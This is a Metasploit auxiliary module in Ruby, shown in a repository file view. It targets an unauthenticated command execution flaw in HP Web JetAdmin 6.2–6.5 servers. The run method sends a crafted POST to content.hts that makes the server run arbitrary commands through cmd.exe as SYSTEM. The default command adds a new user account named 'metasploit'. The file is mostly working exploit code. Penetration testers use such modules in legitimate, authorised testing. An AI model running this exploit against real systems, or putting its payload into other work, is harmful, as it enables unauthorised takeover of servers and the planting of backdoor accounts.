Files
metasploit-gs/modules/auxiliary/admin/http/hp_web_jetadmin_exec.rb
T
Brent Cook b08d1ad8d8 Revert "Land #6812, remove broken OSVDB references"
This reverts commit 2b016e0216, reversing
changes made to 7b1d9596c7.
2016-07-15 12:00:31 -05:00

54 lines
1.6 KiB
Ruby

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'HP Web JetAdmin 6.5 Server Arbitrary Command Execution',
'Description' => %q{
This module abuses a command execution vulnerability within the
web based management console of the Hewlett-Packard Web JetAdmin
network printer tool v6.2 - v6.5. It is possible to execute commands
as SYSTEM without authentication. The vulnerability also affects POSIX
systems, however at this stage the module only works against Windows.
This module does not apply to HP printers.
},
'Author' => [ 'patrick' ],
'License' => MSF_LICENSE,
'References' =>
[
[ 'OSVDB', '5798' ],
[ 'BID', '10224' ],
#[ 'CVE', '' ],# No CVE!
[ 'EDB', '294' ]
],
'DisclosureDate' => 'Apr 27 2004'))
register_options(
[
Opt::RPORT(8000),
OptString.new('CMD', [ false, "The command to execute.", "net user metasploit password /add" ]),
], self.class)
end
def run
cmd = datastore['CMD'].gsub(' ', ',')
send_request_cgi({
'uri' => '/plugins/framework/script/content.hts',
'method' => 'POST',
'data' => 'obj=Httpd:ExecuteFile(,cmd.exe,/c,' + cmd + ',)'
}, 3)
end
end